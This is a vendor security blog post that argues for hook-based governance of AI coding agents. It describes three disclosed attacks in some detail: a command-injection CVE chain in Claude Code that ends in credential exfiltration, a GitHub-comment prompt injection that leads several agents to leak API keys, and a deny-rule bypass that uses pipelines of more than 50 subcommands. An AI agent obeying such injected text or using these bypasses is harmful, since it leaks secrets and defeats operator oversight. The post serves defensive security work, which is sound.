By clicking “Accept”, you agree to the storing of cookies on your device to enhance site navigation, analyze site usage, and assist in our marketing efforts. View our Privacy Policy for more information.
18px_cookie
e-remove
Blog

When the Guardrails Slip: The Case for Hook-Based Governance Across Agent Platforms

Three recent CVEs across Claude Code, Gemini CLI, and Copilot show why enterprises need a platform-agnostic hook layer for agent governance.

Written by
George Apostolopoulos
George Apostolopoulos
Published on
May 18, 2026
Updated on
May 18, 2026
Topics

Over the last two weeks, three separate disclosures have landed against widely deployed coding agents:

  1. A chain of command-injection CVEs in Claude Code that ends in credential exfiltration 
  2. A cross-vendor prompt-injection attack that hijacks Claude Code, Gemini CLI, and GitHub Copilot through nothing more exotic than a GitHub comment
  3. A Claude Code deny-rule bypass that silently stops enforcing policy after 50 subcommands

They're different attacks. They exploit different weaknesses. But they share two uncomfortable properties. First, in each case the platform's own guardrails were the thing that failed, the vendor's permission prompt, the deny-rule engine, the token-parsing logic. Second, the attacks span vendors: a shop running one coding agent today is running a different one next quarter, and the security posture resets each time.

This post makes the argument that a thin, platform-agnostic governance layer that plugs into the hook points each agent already exposes would have disrupted or contained most of what we've seen, without replacing anything the vendors ship. The same policy, "don't let the agent write .claude/settings.json," "don't let it exfiltrate a file that matches a credential pattern," "deny this git push", should apply whether the underlying agent is Claude Code, Gemini CLI, or Copilot. Hooks are the only surface where that's true today.

A quick refresher on agent hooks

Most modern agent CLIs expose hook points for third-party interception at well-defined events: tool calls, file reads and writes, shell execution, pre- and post-prompt to name just a few. A hook is simply code the operator drops in that sits between "the agent intends to do X" and "X actually happens," with the option to allow, deny, or rewrite the action.

Hooks are attractive for enterprise governance because they're easy to deploy (a config file, not a kernel module), they run in userspace, they can be centrally policy-managed, and, crucially, the shape of what they intercept (tool names, file paths, network destinations) is increasingly convergent across vendors. They are not a substitute for a real sandbox or kernel-level monitoring. They are, however, the only control surface that extends cleanly across agent platforms today.

With that framing, let's take a look at the three recent attacks.

Attack 1: the chain of command-injection CVEs

Phoenix Security disclosed three CWE-78 OS command injection vulnerabilities in Claude Code CLI, confirmed exploitable on v2.1.91. They share a root cause, unsanitized string interpolation into shell-evaluated execution, and, more interestingly, they chain.

CVE-2026-35020 is the zero-interaction entry point: an attacker who controls the TERMINAL environment variable gets arbitrary command execution during CLI initialization. CVE-2026-35021 is a classic POSIX double-quote bypass in the editor-path utility, $() and backtick substitution evaluates inside double quotes, so quoting the path doesn't save you. CVE-2026-35022 is the most dangerous: auth-helper configuration values are invoked with shell=true and no input validation, giving the attacker a reliable execution sink on every auth cycle.

The chain is elegant. CVE-2026-35020 establishes execution. The attacker writes a malicious .claude/settings.json that registers a hostile auth helper. On the next authentication, CVE-2026-35022 detonates, and the Phoenix researchers demonstrated four escalating exfiltration variants, ending with multi-line file exfiltration that included Claude Code's own conversation memory.

Where would hooks have intervened? Most decisively, at two points in the middle of the chain:

A file-write hook watching .claude/settings.json and adjacent agent-config paths would flag the implant stage. Configuration writes to the agent's own control surface are a natural canary, the agent itself almost never needs to write them during a session.

A file-read hook on credential-bearing paths (~/.aws/credentials, .env, MEMORY.md, keychain shims) would catch the data collection stage before anything leaves the host.

The one place hooks would not cover is the entry point. CVE-2026-35020 fires during process startup, before agent-layer hooks initialize. Closing that gap requires environment-variable hygiene at the wrapper level which is cheap but needs to happen outside the agent runtime.

Attack 2: prompt injection attack via comment

The Comment and Control research, disclosed April 16 by Aonan Guan and collaborators at Johns Hopkins, is the most strategically important of the three. It is cross-vendor by construction: the same attack pattern works against Anthropic's Claude Code Security Review action, Google's Gemini CLI Action, and GitHub Copilot Agent. Anthropic rated its variant CVSS 9.4 Critical.

The mechanics have been seen time and time again. An attacker opens a GitHub PR or issue whose title, body, or comment contains prompt-injection content. The agent, running inside a GitHub Actions runner with access to important secrets (ANTHROPIC_API_KEY, GEMINI_API_KEY, GITHUB_TOKEN), ingests the comment as part of its context. The injection instructs the agent to read the secret and write it back, often through GitHub itself, as a commit, an issue edit, or a PR comment. No external command-and-control infrastructure is required; the exfiltration channel is the same platform the agent is already authorized to use.

The architectural observation the researchers make is the one that matters: the prompt injection here is not a bug. It is context the agent is designed to process. Model-level defenses, prompt-level defenses, and GitHub's own runtime layers all exist and were all bypassed, because they all sit upstream of the action the agent ultimately takes.

This is where hooks shine, and where the cross-platform argument becomes concrete:

A pre-tool-call hook can deny or gate git push, gh CLI invocations, and API calls whose payloads match credential patterns. The same rule, "never let the agent emit a token that matches ghp_, sk-ant-, or AIza", applies equally to Claude Code, Gemini CLI, and Copilot.

A pre-file-read hook on environment and credential paths blocks the collection step. Again, one rule across three agents.

The enterprise-relevant point is not any one of these rules. It's that an organization running three different coding agents should not have to configure three different policy engines to express the same intent. Hooks are the first control surface where a single policy can sit in front of all three.

Attack 3: the deny-rule bypass

Adversa AI's disclosure is smaller in scope but is, in some ways, the most instructive. Claude Code's user-configurable deny rules silently stop enforcing when a compound command contains more than 50 subcommands. An internal constant named MAX_SUBCOMMANDS_FOR_SECURITY_CHECK caps how many subcommands get analyzed; anything beyond position 50 falls back to a generic "ask" prompt, which in automated or long-running contexts is effectively a permit.

The origin is mundane: internal ticket CC-643 noted that analyzing very long pipelines was freezing the UI, so engineering capped it. The assumption was that legitimate users rarely chain that many commands manually. That assumption is straightforwardly wrong in an agent context, an AI-generated pipeline from a prompt-injected source file can easily be 50 harmless-looking commands followed by a malicious payload at position 51.

What this attack really demonstrates is a governance principle, not a patch-level bug. Native agent guardrails are subject to vendor engineering trade-offs, performance, UX, token budget, that you cannot see and cannot audit, and those trade-offs can silently degrade security properties you were relying on. Anthropic's own newer tree-sitter parser, which would have fixed this, existed in the codebase but was not enabled in public builds at disclosure time.

A hook-based policy layer evaluates outside that trade space. It doesn't care whether Claude Code parsed a pipeline eagerly or lazily, or whether the check got token-budgeted out. The hook sees the concrete action the agent is about to take, a specific rm on a specific path, a specific curl to a specific URL, and enforces policy on that. The native control plane is one layer; the hook layer is a second, independent one, and independence is the whole point.

Mapping attacks to hook intercept points

Pulling the three attacks together gives a compact coverage picture. The table below uses the same attack-stage-by-hook-type framing that's natural to operators thinking about where to deploy:

Attack stage Hook type Would a hook catch it?
TERMINAL env-var injection (CVE-2026-35020) Process-spawn / env sanitization Partial — needs a layer outside the agent runtime
Editor path subshell injection (CVE-2026-35021) Shell-argument inspection Yes, with pattern matching on $() and backticks
Malicious .claude/settings.json write File-write hook Strong intercept
Credential / memory file read File-read hook Strong intercept
GitHub comment prompt injection → git push of secrets Pre-tool-call hook Strong intercept, vendor-agnostic
Deny-rule bypass via 50+ subcommand pipeline Pre-cmd-execution hook Strong — external hook is not token-budgeted

Two things stand out. First, the middle of every attack chain, the file touch, the tool call, the egress, gets covered. Second, the coverage is the same regardless of which agent vendor is running underneath, because the events at those points are structurally similar across platforms.

What hooks do not cover

A hook layer is not a sandbox and shouldn't be sold as one. The attacks above also highlight its limits:

Entry-point injection that fires before the agent's hook loader runs, the TERMINAL case, is a timing gap. The fix is environment hygiene at process launch, which lives in a wrapper script or orchestrator, not in the hook layer itself.

In-process bypasses, an attacker who already has code execution inside the agent runtime, can likely sidestep userspace hooks. That's a threat model for a real OS-level sandbox (seccomp, landlock, an eBPF-based layer like the sandboxing efforts some teams are experimenting with). Hooks and sandboxes are complementary, not competing.

Policy authoring is the part vendors don't solve for you. The rules above, "alert on writes to agent config," "deny egress of credential-pattern bytes", have to be written and maintained. A hook layer is a control plane; the actual policy is still your call.

Why we think this matters

We've been building a hook-based agent governance product with exactly this threat landscape in mind. It currently supports file-access policy across multiple agent platforms; network-egress and tool-call policy are on the near-term roadmap. The bet is not that hooks are the last word in agent security, they aren't, but that they are the first layer that actually composes across the agent ecosystem an enterprise is likely to deploy. Every attack we've walked through here would have been wholly or partially contained by a small set of hook rules that transfer, unchanged, from Claude Code to Gemini CLI to Copilot.

If you're running coding agents in production and wrestling with the fact that each one has its own permission model and none of them are central-auditable, we'd love to compare notes. The interesting question isn't whether hooks are sufficient, they aren't, but whether a platform-agnostic hook layer is the right place to start building the governance story that your native controls can't, by design, give you.

Further reading